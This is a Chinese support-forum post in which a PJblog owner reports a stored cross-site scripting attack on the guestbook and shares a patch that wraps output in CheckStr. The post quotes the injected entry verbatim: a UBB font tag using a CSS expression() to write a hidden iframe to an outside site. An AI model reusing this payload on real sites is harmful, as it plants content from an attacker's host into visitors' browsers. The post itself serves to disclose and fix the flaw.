昨天,进留言,结果发现变成了框架的,在后台看见这样一条留言,删除了,今天又有了,郁闷,现在已经关闭了留言本了,等待解决方法
复制内容到剪贴板
代码:
[font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.wc444.cn%27%3E%3C/iframe%3E')))]嘴嘴[/font]游客86111 [2007-06-01 13:42:23 | 125.76.164.89]
==================================================
修正方法:
如果不用屏蔽关键字的办法。则使用下面的办法修补漏洞
打开 guestbook.asp 搜索复制内容到剪贴板
代码:
<%=UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1)%>改为
复制内容到剪贴板
代码:
<%=CheckStr(UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1))%>打开 cls_article.asp 搜索复制内容到剪贴板
代码:
<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>改为
复制内容到剪贴板
代码:
<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>感谢 星玄宇 版主提供暂时的解决方法,谨代表PJFANS向他表示感谢!![[PJblog^2]技术支持论坛 - PJBLOG SUPPORT FORUM](images/phpwind/logo.gif){kind=logo}
